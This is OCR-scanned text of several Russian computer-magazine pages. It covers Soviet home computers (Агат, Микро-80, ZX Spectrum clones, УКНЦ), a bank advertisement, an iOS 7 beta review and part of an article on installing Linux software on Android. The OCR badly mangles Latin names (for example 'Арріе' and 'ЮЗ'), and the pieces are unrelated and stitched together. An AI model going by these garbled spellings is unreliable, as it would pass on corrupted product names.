Васкіп ІЬе .зи 



5 * 




АГАТ 

В 1981 году никто и предположить не мог, какая из компьютерных платформ 
победит, да и задумывались об этом немногие. Разнообразие и несовмести- 
мость были абсолютно привычными, и никто не удивлялся, что программы 
для компьютеров одной модели не запускаются на компьютере другой. Если 
не запускаются, значит, нужно переписать — такова жизнь. 

Возможно именно поэтому в Научно-исследовательском институте вы- 
числительных комплексов (НИИВК) не придали большого значения тому, 
что создаваемый там будущий школьный компьютер на основе Арріе 11+ 
не будет совместим ни с другими советскими машинами, ни со своим аме- 
риканским оригиналом, ни даже со своим болгарским собратом «Правцем 
82». Позаимствовав общее устройство Арріе 11+ и даже изыскав возможность 
закупить оригинальные процессоры МС36502, в НИИВК решили по-другому 
реализовать управление памятью и полностью переделали графическую си- 
стему. В результате было утеряно главное достоинство клонирования — со- 
вместимость. 

«Агат-4», поступивший в серийное производство в 1983 году, был вось- 
мибитной машиной с 64 Кб оперативной памяти, дисководом для 5,25-дюй- 
мовых дискет (140 или 840 Кб) и ярко-красным корпусом. Он производился 
на Лианозовском электромеханическом заводе и распространялся по учеб- 
ным заведениям. Кроме компьютеров, классы получали набор софта «Школь- 
ница», включавший в себя интерпретаторы ВАЗІС и РАПИРА — причудливого 
языка с русским синтаксисом. 

Для «Агатов» худо-бедно написали собственный софт, включая текстовый 
редактор, СУБД, клон электронных таблиц ѴізіСаІс и, конечно же, игры — куда 
без них на уроке информатики! Модификация «Агат-7» была уже более со- 
вместимой с Арріе II, но для запуска тамошних приложений нужен был дру- 
гой видеоадаптер — он выпускался отдельно, был в народе прозван «ячейкой 
121 » (по индексу в названии платы) и являлся абсолютным мастхэвом для лю- 
бого обладателя «Агата». 



МИКРО-80 

«Ребята, хватит заниматься ерундой. Персо- 
нального компьютера не может быть. Могут 
быть персональный автомобиль, персональная 
пенсия, персональная дача. Вы вообще знае- 
те, что такое ЭВМ? ЭВМ — это 100 квадратных 
метров площади, 25 человек обслуживающего 
персонала и 30 литров спирта ежемесячно!» — 
этой анекдотичной речью заместитель мини- 
стра радиопромышленности СССР встретил 
разработчиков «Микро-80», одного из первых 
советских домашних компьютеров. 

Рассказывают, что разработчиками серии 
популярных домашних компьютеров специ- 
алисты из Московского института электрони- 
ки и математики стали по чистой случайности. 
В МИЭМ чудесным образом пришла посыл- 
ка из НПО «Кристалл», предназначавшаяся 
для другого заведения — ИНЭУМ, где, как мы 
знаем, разрабатывались СМ ЭВМ. Перепра- 
вить лежавшие в коробке чипы К580ИК80 (клоны ІпѣеІ І8080) рука у получателей не поднялась, зато умений хватило для того, чтобы 
разработать на основе этих чипов новый компьютер. 

Изобретение, правда, не превратилось в серийный продукт — вместо этого команда создателей «Микро-80» публиковала ста- 
тьи в журнале «Радио», где рассказывалось, как создать собственный компьютер с нуля, там же приводились схемы плат и дампы 
ПЗУ в шестнадцатеричном виде. Воссоздать «Микро-80» по чертежам получалось далеко не у всех желающих — для этого нужно 
было раздобыть больше 200 микросхем и собрать из них несколько модулей. 

Тот, кто проходил этот тернистый путь от начала до конца, оказывался обладателем восьмибитного компьютера с 64 Кб оператив- 
ной памяти, которому в качестве монитора служил обычный телевизор, а вместо дисковода приходилось использовать кассетный 
магнитофон — распространенная в те времена практика. Но скромность характеристик не имела никакого значения: первый ком- 
пьютер — это как первый секс, и самое важное, чтобы он был, а уж какой — дело десятое. 
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2Х ЗРЕСТРІІМ 



Компьютер 7Х Зресігит, созданный британской фирмой Зіпсаііг 
ВезеагсИ в 1982 году, занимает поистине особое место — как в исто- 
рии популярных в СССР домашних ПК, так и в сердцах своих облада- 
телей. Последних, кстати, было огромное множество, а число клонов, 
из которых можно было выбирать, превышает все разумные преде- 
лы: их список насчитывает более двухсот разновидностей. 

Откуда вдруг взялась такая популярность? Остальные зарубеж- 
ные компьютеры проникали в СССР с трудом, и даже если их кло- 
нировали, то настолько меняли в процессе, что о программной со- 
вместимости речь обычно не шла. Клоны «Спекки» (это английское 
прозвище 7Х Зресітит прижилось и у нас) были неплохими по тем 
временам и для своих денег компьютерами: имели процессор с так- 
товой частотой 3,5 МГц, 48 Кб оперативной памяти (в классическом 
варианте) и видеорежим, поддерживающий 15 цветов, — правда, 
только по два разных цвета в квадрате восемь на восемь точек. Но са- 
мое главное — «Спектрумы» были дешевы, просты в сборке и под- 
держивали весь зарубежный софт и игры, которых к началу девяно- 
стых была написана не одна тысяча. 

Строение процессора 2іІод 2. 80, устанавливавшегося в фирмен 
ные «Спектрумы», не было секретом, и его при желании можно было 
воспроизвести — в том числе в промышленных масштабах. А вот 
устройство микросхемы ІІІ_А, в которой содержалась немалая часть 
компьютера, фирма Зіпсіаіг Везеагсіі засекретила и по возможности 
защитила от копирования. Узнать ее содержимое было невозможно 
Или почти невозможно... 

В 1984-1985 годах команда советских электронщиков из ОКБ 
Львовского политехнического института проделала немалую работу 
результатом которой стала полная обратная разработка ІІБА и по 
вторение 2Х Зресітит на советских компонентах. Это была настоя 
щая победа умелых рук и хакерской мысли! «Львовский вариант» 2Х 
Зресітит быстро распространился и дал начало другим клонам. Их 
нередко называли в честь города, где жили авторы: к примеру, попу 
лярными последователями «львовского варианта» были «Москва-48 
и «Ленинград-48». 

В 1991 году история Советского Союза закончилась, а вот исто 
рия 2Х Зресігит продолжалась как ни в чем не бывало. В то время 
как централизованное производство советских компьютеров вроде 
УКНЦ или БК останавливалось, собираемые на коленке «Спектру 
мы» процветали. Вокруг них сформировалось сообщество, и его 
силами были созданы такие вещи, которым западные поклонники 2Х 
Зресітит могли лишь дивиться. 

Интерес к «Спектруму» не ослабевал примерно до середины де 
вяностых годов, да и потом не утих окончательно. Вокруг этого ком 
пьютера происходили интереснейшие вещи: клоны становились все 
совершеннее (поддерживали больший объем памяти, дисководы 
и самую разнообразную периферию), писались новые программы 
и игры и даже выпускались электронные журналы на дискетах. У рос 
сийских спектрумистов был даже свой аналог сети РЮО — он назы 
вался ІХМеІ:. И именно со «Спектрума» началась российская демос 
цена — с 1996 года и до сих пор проводятся ежегодные фестивали 
(сперва это был московский ЕпІідИІ:, а сейчас — питерский СІіаоз 
Сопзітисіюпз), на которых можно встретить друзей-спектрумистов 
и даже увидеть новые демо. 
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ЭЛЕКТРОНИКА 
МС051 1,УКНЦ 

(УЧЕБНЫЙ КОМПЬЮТЕР НАУЧНОГО ЦЕНТРА) 

ДВК, БК, «Агаты», «Корветы», ІВМ РС и разнообразные кло- 
ны и разновидности этих компьютеров активно закупались 
для школ в середине восьмидесятых годов и становились 
основой КУВТ — комплексов учебной вычислительной тех- 
ники. Но наиболее популярным школьным компьютером 
стала «Электроника МС 0511», также носившая название 
УКНЦ (учебный компьютер научного центра). Он был раз- 
работан все тем же НИИТТ на основе процессора КМ 1801, 
но в отличие от БК-0010 модификации ВМ2, а не ВМ1 . 

УКНЦ тем не менее был куда более продвинутой маши- 
ной, чем БК: помимо основного процессора, работавшего 
на частоте 8 МГц, имелся и второй чип того же семейства. 
Он назывался периферийным и имел тактовую частоту 
6,25 МГц. Процессоры соединялись высокоскоростной ма- 
гистралью, и каждый из них имел свой блок памяти — 64 Кб 
для центрального процессора, 32 для периферийного и еще 
96 Кб видеопамяти. Этого хватало для вывода графики 
в разрешении до 640 на 288 пикселей и до восьми цветов 
одновременно (из 16 доступных). Второй процессор отве- 
чал за работу с устройствами ввода-вывода, но мог быть за- 
действованным и для общих вычислений. 

С разработкой УКНЦ были связаны немалые амби- 
ции — номинально он значительно превосходил по харак- 
теристикам другие варианты школьных компьютеров. Во- 
круг новой разработки было много шумихи: в бравурных 
речах руководители проекта доходили до того, что проро- 
чили УКНЦ будущее в качестве «самого популярного ком- 
пьютера до 2000 года»! 

Реальность оказалась и близко не столь прекрасной. 
Недостаточно продуманная архитектура компьютера не по- 
зволяла ему достичь потенциально возможной производи- 
тельности — считалось, что его мощности хватило бы на 1 ,5 
миллиона операций в секунду, тогда как на практике выхо- 
дило не более 600 тысяч. Есть и другие следы несбывших- 
ся планов — к примеру, у УКНЦ был слот для картриджей, 
но картридж в итоге выпустили всего один (он содержал 
«Бейсик Вильнюс» — диалект бейсика с возможностью ком- 
пиляции в промежуточный код). Ну и наконец, надежность 
компьютеров была невысокой: в компьютерном классе, 
оборудованном УКНЦ, неизменно обнаруживалось сразу 
по несколько вышедших из строя машин. Ш-И 
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мероприятия для держателей «Мужской Карты» 



Управлять своими счетами, используя систему 
интернет-банка «Альфа-Клик» 



Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а также заказав по телефонам: 

8 (495) 788-88-78 в Москве 1 8-800-2000-000 в регионах России (звонок бесплатный) 



МАХІМ А 

клѴШГМЛЛІ ШѴОЫЗА П ЫМГНСігі 



Альфа-Банк (дате)іаті 



ѵѵѵѵѵѵ.тапсагсі.ги 



Генеральная лицензия банка России на 
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Детальный обзор І05 7 

Десятого июня Арріе представила первую бета-версию 
ЮЗ 7, назвав ее самым значительным обновлением опера- 
ционной системы с момента выхода на рынок оригиналь- 
ного іРІіопе. «Семерка» получилась действительно новой, 
свежей, интересной ОС, но уже через пару дней после по- 
явления успела заработать славу «поделия плохих дизай- 
неров» и «убийцы Арріе». Действительно ли так плоха ЮЗ 7 
и не надуманны ли претензии поклонников іРІюпе? Попро- 
буем разобраться. 



ВВЕДЕНИЕ 

На самом деле в состав ЮЗ 7 вошло не так уж 
и много коренных изменений. В основном это 
небольшие доработки и несколько давно ожи- 
даемых функций, таких как панель управления 
в стиле кнопок управления питанием в шторке 
АпсІгоісІ 4.2, функция отправки контента на со- 
седние смартфоны АШгор, полноценная много- 
задачность и несколько других. Настоящим же 
откровением для пользователей, как это обычно 
и бывает, стал графический интерфейс, который 
преобразился кардинально. 



ОТ ПРОШЛОГО К БУДУЩЕМУ 

Необходимость модернизировать графический 
интерфейс ЮЗ назревала давно. Все это время 
визитной карточкой Арріе был насыщенный де- 
талями, отражениями, стилизацией под стекло, 
кожу и красное дерево интерфейс, придающий 
смартфону эффект дороговизны и элитарно- 
сти. Однако с течением времени он начал терять 
свои позиции, когда целевая аудитория смарт- 
фонов сместилась в сторону молодежи и в ди- 
зайн пришла простота, свойственная АпсІгоісІ 4.Х 
и ѴѴіпсІоѵѵз РІіопе 7. 



Дизайн ЮЗ действительно устарел и требовал 
вливания чего-то нового и современного. Долгое 
время Арріе придерживалась консервативного 
подхода и не решалась существенным образом 
менять ни интерфейс, ни способ управления 
смартфоном. Однако все изменилось, когда по- 
сле провала «Карт Арріе» в ЮЗ 6 на пост вице- 
президента по пользовательскому интерфейсу 
был назначен Джонатан Айв, до этого отвечавший 
за внешний вид смартфона и некоторых других 
продуктов Арріе. 

В отличие от Стива Джобса и Скотта Форстол- 
ла (с 2007 по 2012 год занимал пост старшего 
вице-президента по ЮЗ ЗоТСѵѵаге), Айв был про- 
тивником скевоморфизма (см. врезку), насквозь 
пропитывающего ЮЗ и ОЗ X, и придерживался 
идей простого плоского дизайна, в котором нет 
места стилизованным под бумагу блокнотам, фо- 
тореалистичным часам и насыщенным деталями 
иконкам. И как только Айв заступил на должность, 
он инициировал процесс модернизации графиче- 
ского интерфейса ЮЗ. 

В результате на свет появилась ЮЗ 7 — яркая, 
современная, не обремененная деталями и... 
ненавистная пользователям. В «семерке» реди- 
зайну подверглись практически все элементы 
интерфейса и все стоковые приложения. Одна- 
ко наиболее противоречивыми стали домашний 
экран и иконки приложений. 

ЭТОЖЕМЕЕСО! 

Как и весь остальной интерфейс, домашний экран 
стал легким, ярким и воздушным. На смену пере- 
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полненным деталями иконкам пришли простые, 
практически схематичные пиктограммы, статус- 
ная строка и док стали полупрозрачными, а обои 
теперь слегка смещаются относительно осталь- 
ных элементов домашнего экрана при наклоне 
смартфона. В результате кроме воздушности до- 
машний экран приобрел эффект глубины — еще 
больше его усиливают динамические обои, ко- 
торые теперь можно установить на экран вместо 
обычного изображения (привет, АпсІгоісІ). 

Проблема всех этих новшеств заключается 
только в том, что они действительно не выглядят 
как работа дизайнеров Арріе. В то время как об- 
щая идея домашнего экрана получилась вели- 
колепной, его отдельные элементы вызывают 
не то чтобы даже вопросы, а ступор и недоуме- 
ние. Взгляни, например, на иконки ЗаТагі, кален- 
даря или напоминаний. Кажется невероятным, 
что дизайнеры Арріе могли сделать такое. И зна- 
ешь что? Это на самом деле делали не дизайнеры 
Арріе. 

Если верить представителям самой компа- 
нии, разработать палитру цветов и внешний вид 
иконок ЮЗ 7 изначально было поручено отделу 
маркетинга и лишь затем команда дизайнеров 
приложений доводила их до окончательного вида. 
Конечно же, остается вопрос, куда смотрели ди- 
зайнеры того же ЗаТагі, зато общую несогласо- 
ванность дизайна иконок и сильнейший разброс 
стилей легко объяснить тем, что команды отдель- 
но взятых приложений вообще не сотрудничали 
друг с другом. На этом фоне обещания Айва «вне- 
сти порядок в запутанность» выглядят несколько 
странно. 

Экран блокировки, кстати, также серьезно из- 
менился. Из него наконец-то исчез этот жуткий 
ползунок, и вообще он стал минималистичным 
и теперь напоминает экран блокировки АпсІгоісІ 
или ѴѴіпсІоѵѵз РНопе с их часами, написанными 
тонкой гельветикой. В принципе, выглядит очень 
достойно, но и здесь не обошлось без конфу- 
за. Если посмотреть внимательно, в нижней 
и верхней части экрана можно заметить стрелки. 
С верхней все понятно, она намекает на возмож- 
ность вытянуть шторку, не разблокируя смартфон 
(опять же фишка АпсІгоісІ), но что делает нижняя? 



Разблокирует смартфон? Вовсе нет, это панель 
управления питанием. 

ОСОВРЕМЕНЕННАЯ ШТОРКАМ ПАНЕЛЬ 
УПРАВЛЕНИЯ ПИТАНИЕМ 

Да-да, в ЮЗ наконец-то появилась функция, ко- 
торая есть в АпбгоісІ-прошивках Затзипд еще 
со времен АпсІгоісІ 2.3 и в СуаподепМосІ с версии 
7. Это возможность быстро включать различные 
настройки и функции, такие как ВІиеІооШ, ѴѴі-Рі, 
фонарик и прочие. Однако если в тех же самсун- 
говских прошивках и АпсІгоісІ 4.2 все это находится 
в шторке, то в ЮЗ — в панели, доступной по свай- 
пу с противоположной стороны, то есть снизу. 

Потянув из-за нижней части экрана вверх, 
ты увидишь на экране панель с феерически раз- 
мытым фоном, с помощью которой можно вклю- 
чить те самые ѴѴі-Рі, режим полета, бесшумный 
режим, а также управлять яркостью, медиапро- 
игрывателем, включить режим АігЭгор (о нем 
позже), фонарик, будильник, калькулятор и ка- 
меру. Довольно солидный набор, минус которого 



только в том, что он абсолютно статичен и не по- 
зволяет себя видоизменять. Так что отказываться 
от Сусііа, похоже, еще рановато. 

Сама шторка (панель уведомлений) также 
сильно видоизменилась, причем, как мне кажет- 
ся, не к лучшему. С одной стороны, дизайн шторки 
наконец-то стал простым и лаконичным и она из- 
бавилась от этого дурацкого фона, свойственного 
веб-сайтам девяностых годов. С другой — яблоч- 
ники зачем-то разделили ее на три отдельных 
панели. «Сегодня» содержит информацию о дате, 
событиях календаря, акциях и погоде, «Все» — 
уведомления, «Пропущенные» — пропущенные 
уведомления. По умолчанию, соответственно, от- 
крывается вкладка «Сегодня», которая для боль- 
шинства из нас вообще бесполезна. 

Сразу обращу твое внимание на шрифт. 
Теперь тонкая гельветика (название шрифта: 
Неіѵейса Ыеие ШгаІідГіІ:) и крупные заголовки, 
впервые появившиеся в ѴѴіпсІоѵѵз РНопе, а за- 
тем перенятые Соодіе в АпсІгоісІ, используются 
практически во всех элементах интерфейса. Это, 




На самом деле на экра- 
не смартфона Ю8 7 вы- 
глядит намного лучше 
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После ЮЗ 7 Арріе должна сменить и логотип 



кстати, несколько ломает эстетику интерфей- 
са в некоторых местах, но шрифт приятен глазу 
и отлично читается на Веііпа-дисплее. Особенно 
в сочетании с правильным дизайном, таким, на- 
пример, как в приложении «Погода». Впрочем, 
его явно слизали с дизайна погодного приложе- 
ния Ѵаііоо!. 

ПЕРЕКЛЮЧЕНИЕ ЗАДАЧ, 

ПОИСК И ДРУГИЕ МЕЛОЧИ 

Еще одно существенное изменение, которое на- 
верняка понравится всем, кто уже какое-то время 
пользуется ІРІіопе, — это новый способ переклю- 
чения между задачами. Вместо иконок в нижней 
части экрана теперь используются карточки с ми- 
ниатюрами запущенных приложений, которые 
можно закрывать, смахнув вверх. Эту функцию 
разработчики явно позаимствовали из операци- 
онной системы Ореп ѵѵеЬОЗ. Хотя в АпбгоісІ 4.Х 
используется похожий подход. 

Кстати, кроме интерфейса управления, в ЮЗ 7 
изменился и сам подход к многозадачности, 
которая наконец стала полноценной. В фоне те- 
перь могут работать любые приложения. Причем, 



по словам разработчиков, система теперь более 
интеллектуально управляет фоновыми приложе- 
ниями, основываясь на том, как ты используешь 
девайс. Например, если каждое утро в 10 часов 
ты запускаешь приложение для чтения новостей, 
то ЮЗ сама будет заранее обновлять новости, 
чтобы тебе не пришлось делать это самостоятель- 
но. Кроме того, обновления будут производиться 
в часы наименьшей нагрузки на процессор и бо- 
лее качественной связи. 

«Нулевой экран с поиском» (ЗроІІідІіІ) также 
остался в прошлом. Теперь для поиска по смарт- 
фону достаточно потянуть домашний экран вниз, 
и в его верхней части появится строка ввода. 
Кстати, ориентированность на жесты и разно- 
го рода свайпы теперь неотъемлемая часть ЮЗ. 
Если в предыдущих версиях системы жесты ис- 
пользовались только для самых очевидных дей- 
ствий, то в ЮЗ 7 они стали чем-то обыденным 
и повсеместно используемым. 

Если говорить об интерфейсе в целом, 
то он стал абсолютно плоским и светлым. Место 
объемных и тяжелых заголовков заняли белые 
плашки, кнопки фактически исчезли как класс, 
а на их месте остался лишь синий текст или си- 
не-белые схематичные иконки. Изменились не- 
которые эффекты переходов, плоской стала 
и клавиатура, хотя ее общая геометрия и ме- 
ста расположения клавиш остались прежними. 
За вычетом некоторых огрехов и явных проблем 
с иконками приложений, интерфейс ЮЗ 7 явно 
похорошел и наконец стал выглядеть современно 
и легковесно. 

МЕНЕЕЗАМЕТНЫЕ МЕЛОЧИ 

Если же говорить о не связанных напрямую 
с интерфейсом изменениях, то здесь ЮЗ 7 по- 
хвастаться особо нечем. Наверное, наиболее 
примечательное новшество — это поддержка 
механизма АігЭгор, этакого аналога АпбгоісІ Веапл 
для быстрой передачи данных между устройства- 
ми. АігЭгор уже давно есть в настольной 08 X, и, 
скорее всего, для ЮЗ 7 будет обеспечена воз- 
можность обмена как между мобильными, так 
и между настольными системами. 



Второе важное новшество — это расширенная 
защита от кражи. Если смартфон будет потерян, 
он может вывести на экран сообщение (напри- 
мер, с просьбой вернуть девайс), а в случае уда- 
ленного вайпа с помощью сервиса РіпсІ Му ІРІіопе 
будет заблокирован с просьбой ввести Арріе Ю. 
Довольно приятное новшество, которое, к сожа- 
лению, в России работать не будет. У нас и забло- 
кированный телефон не вернут :). 

Из других новинок можно отметить давно ожи- 
даемую возможность автоматического обновле- 
ния приложений и поддержку бортовых автомо- 
бильных систем. Также, начиная с ЮЗ 7, в іТипез 
появится радио, бесплатное для прослушивания 
и с возможностью автоматически формировать 
станции (как в І_аз1:.Тпл) и пропускать треки. Пока 
что радио не работает, и неизвестно, будет ли оно 
доступно на территории России. 

ПРИЛОЖЕНИЯ 

Вместе с интерфейсом были обновлены и все 
стоковые приложения. В основном они получили 
чисто косметические изменения. Тем не менее 
в некоторые приложения все-таки были добав- 
лены давно ожидаемые и логичные новшества. 
Наибольшим модификациям подверглись ЗаТагі, 
камера, фотоальбом и почта. 

ЗаТагі теперь и вовсе стал похож на мобиль- 
ный СІіготе во всем, кроме логотипа. Адресная 
строка, как и положено в 2013 году, наконец-то 
слилась со строкой поиска и теперь скрывается 
при перемотке страницы вниз, как в последних 
версиях СНгопле. Промотка в обратную сторону 
приводит к появлению адресной строки. Способ 
переключения между вкладками также сильно 
изменился. Во-первых, появилась возможность 
переключаться с помощью свайпа в разные сто- 
роны. Во-вторых, обзор открытых вкладок те- 
перь выполнен в виде трехмерного стека, опять 
же похожего на стек вкладок в СНгопле. Браузер 
теперь полностью синхронизируется с ЮІоисІ 
Кеусііаіп. 

Сильно переработана камера. Теперь она вы- 
глядит намного проще, но в то же время как-то уж 
слишком схематично, как будто это всего лишь 




ШРО 



Теперь іРІіопе 
с помощью иконок 
показывает не только 
дату, но и актуальное 
время. 

Папки в ЮЗ 7 теперь 
вмещают неограни- 
ченное количество 
элементов. 

В новой ЮЗ по- 
явилась интеграция 
не только с привыч- 
ным РасеЬоок’ом, 
но и с Ѵітео и РІіскг. 
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Лучше всего достоинства нового интерфейса передает приложение погоды 




Редизайн интерфейса Ю8 7, сделанный студентом Лео Драпо (І_ео Ргареаи) , от- 
лично показывает, насколько плохо сработали сотрудники Арріе 



ранний набросок интерфейса. Переключаться 
между режимами съемки теперь нужно с помо- 
щью свайпа вправо или влево. Появились раз- 
личные эффекты в стиле Іпзіадгапл, но выбор тут 
гораздо меньше. 

Вместе с камерой изменилась и фотогалерея. 
Вместо простой сетки фотографий теперь ты уви- 
дишь сначала экран с разбивкой по годам, а затем 
по событиям, которые формируются с помощью 
комбинации места и времени. Например, если 
в пятницу вечером ты ходил на шашлык, то все 
фотографии с этого события будут сгруппирова- 
ны в одно событие, что, согласись, очень удобно. 
С другой стороны, это явное копирование функ- 
ционала приложения іРНоію. 

Немного доработали и почтовый клиент. В нем 
для навигации теперь используется свайп. Пись- 
ма можно легко отправлять в спам, а при подклю- 
чении почтового ящика СтаіІ по ІМАР работает 
синхронизация контактов. Остальные приложе- 
ния подверглись лишь косметическим доработ- 
кам. Список артистов в аудиоплеере теперь ото- 
бражается вместе с обложками альбомов. В 5ігі 
появились новые голоса, а сам интерфейс был 
полностью переработан в стиле «семерки». До- 
вольно сильно и в лучшую сторону изменился но- 
меронабиратель. 

ПОТЕРЯ ИНТУИТИВНОСТИ 

Как бы ни был привлекателен современный мини- 
малистичный дизайн, главное достоинство скево- 



морфизма в его интуитивности. Если ты видишь 
на экране кнопку, значит, ее можно нажать, если 
перед тобой желтый лист бумаги со слегка загну- 
тым углом, ты можешь быть уверен, что под ним 
есть еще один лист. Свайпы в таком интерфейсе 
используются достаточно редко и только там, 
где их применение очевидно; канонические при- 
меры — экран блокировки и все те же бумажные 
листы. 

Новый стиль интерфейса ломает эту выстра- 
иваемую годами и тщательно вылизанную схему 
управления. В нем слишком много двусмыслен- 
ности: кнопки превратились в цветные строки, 
появились жесты даже там, где пользователь 
и не подозревает об их существовании, многие 
элементы интерфейса неочевидны. Это одно- 
временно и большой минус для славившегося 
интуитивностью и простотой управления ІРІіопе, 
и необходимое требование современного интер- 
фейса, который во многом следует канонам ми- 
нимализма глянцевых журналов — таких понятий, 
как кнопка и слайдер, в этих канонах не существу- 
ет в принципе. 

С другой стороны, на презентации новой 
ОС Тим Кук попытался четко донести основную 
идею переработанного интерфейса, сказав, 
что «после установки Ю8 7 вы получите одновре- 
менно и совершенно новый, и уже знакомый вам 
телефон». Это действительно точное высказы- 
вание, ведь, по сути, новый интерфейс изменил 
только внешность системы, но не ее поведение. 



Почти все элементы управления остались на сво- 
их местах, и пользователь, привыкший к предыду- 
щим версиям ОС, уже не промахнется мимо кноп- 
ки и не сделает свайп не с той стороны. 

Если же говорить о тех, кто только начинает 
знакомиться с ІРІіопе, то здесь также не должно 
возникнуть проблем. Времена страха пользова- 
телей перед сенсорными смартфонами уже да- 
леко позади, и уже не надо на пальцах объяснять, 
что разблокировать смартфон нужно с помощью 
свайпа в сторону, а для возвращения к предыду- 
щему экрану следует нажать на кнопку, оформ- 
ленную как стрелка. 

ВЫВОДЫ 

ЮЗ 7 — это хоть и неоднозначный, но правильный 
шаг в нужном направлении. Классический интер- 
фейс ІРІіопе и іРасІ устарел еще несколько лет на- 
зад, и вдохнуть в него новую жизнь можно было 
только с помощью полного редизайна. Другое 
дело, что в отсутствие придирчивого до мельчай- 
ших деталей Стива Джобса новому руководству 
вряд ли удастся представить вылизанный продукт 
и, скорее всего, еще некоторое время интерфейс 
будут доводить до ума. 

В то же время стала особенно заметна тенден- 
ция Арріе копировать чужие идеи. Если раньше 
компания подходила к этому процессу с осторож- 
ностью и продолжала, что называется, гнуть свою 
линию, то с выходом ЮЗ 7 заимствование идей 
превратилось в обычное дело. ИНИ 



ЧТО ТАКОЕ СКЕВОМОРФИЗМ? КОГДА СОЗРЕЕТ ЯБЛОКО? 



Скевоморфизм — придание одним объектам фор- 
мы и вида других изделий или продуктов. В дизайне 
приложений это имитация облика реальных пред- 
метов. Например, электрический чайник, который 
выглядит как обычный металлический чайник 
для плиты, или компьютерный календарь, который 
отображает дни как на бумажных страницах на- 
стольного календаря. 



По информации от Арріе, финальная версия ЮЗ 7 будет доступна в начале осени 
для устройств ІРІіопе 4/45/5, іРосІ Іюисіі 16/32/64СЬ, ІРасІ 2/3/4 и ІРасІ тіпі. При этом из-за 
технических ограничений в четвертой реинкарнации ІРІіопе часть функциональности будет 
отключена. Под удар попали АігЭгор, функция смещения обоев при наклоне и некоторые 
другие. 

Кроме того, представители Арріе пообещали подправить интерфейс к финальной 
версии, поэтому вполне возможно, что к осени мы уже не увидим этих кислотных цветов, 
разброса в иконках и «полюбившейся» всем иконки ЗаТагі. 
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Устанавливаем Ыпих- 
программы на смартфон 
под управлением Апйгоій 

Многие владельцы АпсІгоісІ-фонов испы- 
тывают трудности с запуском настоящего 
І_іпих-софта на своих девайсах. По всем 
законам он вроде должен здесь работать, 
да вот только для его установки почему-то 
нужны права госЛ, сам он распространяет- 
ся в каких-то самодельных инсталляторах, 
а выбор программ сильно ограничен. Эта 
статья предложит ответ на вопрос, почему 
так получилось, и подскажет решение — 
удобный способ установки и запуска почти 
любого І_іпих-софта в АпсІгоісІ. 



игшхилинЕиыих? 

Как известно, андроид основан на ядре І_іпих и включает в себя набор стан- 
дартных библиотек и утилит командной строки, свойственных обычному 
□пих-дистрибутиву. Однако запуск классического Ыпих-софта здесь сильно 
затруднен из-за множества причин, в числе которых несовместимость АВІ, 
отсутствие менеджера пакетов, собственная система безопасности и отсут- 
ствие многих компонентов стандартной Ыпих-системы. 

Так, несмотря на наличие в АпсІгоісІ стандартной библиотеки ІіЬс и других, 
их реализация в большинстве случаев несовместима с библиотеками от про- 
екта СІМІІ и сильно урезана по функционалу. По этой причине Ыпих-софт нужно 
как минимум пересобирать специально под АпсІгоісІ и АПМ-процессор, а во мно- 
гих случаях еще и патчить, добавляя функционал, отсутствующий в библиотеках. 

Система безопасности АпсІгоісІ, обрезающая приложения в привилегиях 
по полной программе и не позволяющая им выходить за рамки собственного 
каталога, также серьезно препятствует работе стандартного Ыпих-софта. По- 
этому часто требуется получать права гооТ которые эти ограничения снимают. 
Отсутствие менеджера пакетов, который бы позволял устанавливать обычный 
Ыпих-софт, а не только ^ѵа-приложения, вынуждает разработчиков писать при- 
ложения, нужные только для того, чтобы устанавливать другие приложения. Так 
появляются все эти кастомные инсталляторы. 

Ну и довершает картину то, что в АпсІгоісІ просто нет многих стандартных компо- 
нентов Ыпих, включая, например, даже такие неотъемлемые, как графический стек 
ХѴѴіпсІоѵѵ или библиотека СТК+. Кое-какие попытки все это сюда принести, конеч- 
но, предпринимаются, но дальше полурабочих альфа-версий дело не двигается. 

Тем не менее возможность перенести в АпсІгоісІ функционал полноценной 
Ыпих-системы слишком уж заманчивая идея, чтобы энтузиасты не попробова- 
ли решить возникающие в процессе проблемы и дать нам универсальное ре- 
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Начальная инициализация ВоШгеѵѵ 



шение. Самый очевидный и простой путь — это 
запустить «виртуализированную» версию полно- 
ценного Ы п их- дистрибутива, о чем мы уже под- 
робно писали. Способ этот интересный, но стра- 
дает от проблемы разделения системы на две 
области, каждая из которых работает независимо 
от другой. 

Гораздо более интересным выглядит проект 
ВоШгеѵѵ ( ЬоІЬгеѵу.сот ) — в его рамках разрабаты- 
вается вполне обычный для Ыпих-систем менед- 
жер пакетов и репозиторий, с помощью которого 
можно устанавливать Ыпих-софт в отдельно взя- 
тый каталог внутри АпсІгоісІ. Также в свое время 
было придумано множество различных скриптов, 
которые позволяют легко и без лишних проблем 
собирать пригодный для работы внутри АпсІгоісІ 
Ыпих-софт на большом брате. Этим двум проек- 
там и будет посвящена оставшаяся часть статьи. 

ВОТВПЕШ 

Проект ВоШгеѵѵ призван решить многие про- 
блемы с установкой Ыпих-софта, которые только 
могут возникнуть у пользователя, и подготовить 
систему АпсІгоісІ к принятию инородных для нее 
приложений. По сути, система состоит из четырех 
компонентов: 

• репозиторий с прекомпилированными 
для АпсІгоісІ приложениями, используя ко- 
торый можно установить многие Ыпих- 
приложения с помощью одной команды; 

• менеджер пакетов, в качестве которого ис- 
пользуется легковесный Оркд или бркд вме- 
сте с арі-деі в экспериментальной версии 
ЕЗоІВгеѵѵ ВгагіІ; 

• менеджер процессов гипіі, необходимый 
для того, чтобы правильно запускать и под- 
держивать работу демонов, если таковые бу- 
дут установлены; 

• собственная система сборки, которая содер- 
жит в себе все инструменты, необходимые 
для кросс-компиляции приложений с помо- 
щью любого настольного Ыпих-дистрибутива. 
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Список установленных приложений 



Для работы это чудо программистской мысли 
требует всего ничего: права гооі и немного свобод- 
ного пространства во внутренней памяти смарт- 
фона или на карте памяти. Причем первый вариант 
предпочтительнее, так как в случае с ЗЭ файлы 
будут свалены на виртуальный диск, работа с ко- 
торым поддерживается далеко не всеми ядрами. 

На данный момент классическая версия 
ВоШгеѵѵ, использующая собственный репози- 
торий, позволяет устанавливать такой софт, 
как бсгоп, ССС, СИ:, ЗЗН-сервер бгорЬеаг, кон- 
сольный браузер І_упх, сканер безопасности 
ІЧтар, инструмент бэкапа гзупс, редактор Ѵіт, 
веб-сервер ІідІійрсІ, скриптовые языки РуІНоп 
и ВиЬу, а также несколько десятков других па- 
кетов. Устанавливается это все, кстати говоря, 
в выделенный каталог во внутренней памяти 
смартфона/планшета и никак не захламляет ос- 
новную систему. Другими словами, избавиться 
от ВоШгеѵѵ и всего, что ты установил, можно бу- 
